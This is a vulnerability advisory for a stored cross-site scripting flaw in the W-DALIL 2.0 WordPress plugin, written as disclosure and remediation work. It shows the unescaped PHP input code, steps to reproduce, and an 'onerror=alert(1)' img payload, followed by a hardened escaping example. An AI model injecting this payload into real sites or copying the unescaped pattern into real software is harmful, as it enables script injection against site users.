WordPress W-DALIL 2.0 Cross Site Scripting
WordPress W-DALIL plugin version 2.0 suffers from a persistent cross site scripting vulnerability.
# Exploit Title: WordPress Plugin W-DALIL - Stored Cross Site Scripting
# Date: 27-06-2022
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/w-dalil/
# Version: 2.0
# Tested on: Firefox
# Contact me: [email protected]

# Vulnerable Code:

```
<input class="dalil_input" name="dalil-address" type="text"
       placeholder="<?php echo __('Dalil item address','w-dalil'); ?>"
       value="<?php echo $dalil_information['dalil-address']; ?>" />
```

# Steps To Reproduce:

1 - First install the plugin "*w-dalil*" and activate it.
2 - Go to Dalil —> Add New Dalil item
3 - Inside the “*Dalil item address*” field, enter the XSS payload “*><img src=x onerror=alert(1)>*” and hit enter.

# PoC Image:

https://imgur.com/JPG97oh
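The root cause is the `echo` of a stored value straight into a `value="..."` attribute without escaping. The block below is an added example, not the plugin's own code or the advisory's: it places that vulnerable pattern beside a hardened version that escapes on output with the real WordPress `esc_attr()`/`esc_attr__()` functions and sanitizes on save with `sanitize_text_field()`. The function names `render_address_field_*` and `sanitize_address_on_save` are hypothetical, and the polyfills at the top exist only so the file runs under the plain `php` CLI outside WordPress.

```php
<?php
// Added example, not the W-DALIL plugin's own code: the unescaped attribute
// echo the advisory shows, beside a hardened version that escapes on output
// and sanitizes on save. esc_attr(), esc_attr__(), __() and
// sanitize_text_field() are real WordPress functions; the polyfills below
// only let this file run under the plain `php` CLI outside WordPress.
if (!function_exists('__')) {
    function __($text, $domain = 'default') { return $text; }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('esc_attr__')) {
    function esc_attr__($text, $domain = 'default') { return esc_attr(__($text, $domain)); }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($str) { return trim(strip_tags((string) $str)); }
}

// Vulnerable pattern from the advisory: the stored value is interpolated
// into value="..." unchanged, so a double quote in it ends the attribute.
function render_address_field_vulnerable(array $dalil_information): string {
    return '<input class="dalil_input" name="dalil-address" type="text" '
         . 'placeholder="' . __('Dalil item address', 'w-dalil') . '" '
         . 'value="' . $dalil_information['dalil-address'] . '" />';
}

// Hardened form: escape at the point of output with esc_attr(), and use
// esc_attr__() for the translated placeholder as well.
function render_address_field_hardened(array $dalil_information): string {
    $address = $dalil_information['dalil-address'] ?? '';
    return '<input class="dalil_input" name="dalil-address" type="text" '
         . 'placeholder="' . esc_attr__('Dalil item address', 'w-dalil') . '" '
         . 'value="' . esc_attr($address) . '" />';
}

// Defence in depth on the save path (hypothetical handler name): strip tags
// and stray whitespace before the value reaches the database.
function sanitize_address_on_save(array $form_input): string {
    return sanitize_text_field($form_input['dalil-address'] ?? '');
}

// Constructed sample input of the shape the advisory's PoC describes.
$stored = ['dalil-address' => '"><img src=x onerror=alert(1)>'];
echo render_address_field_vulnerable($stored), PHP_EOL; // the <img> element lands outside the attribute
echo render_address_field_hardened($stored), PHP_EOL;   // quotes and angle brackets are entity-encoded, markup stays inert
echo sanitize_address_on_save($stored), PHP_EOL;        // tags are removed before storage
```

Output escaping is the fix that closes this bug; sanitizing on save is a second layer, not a substitute, because data can reach the database through other paths.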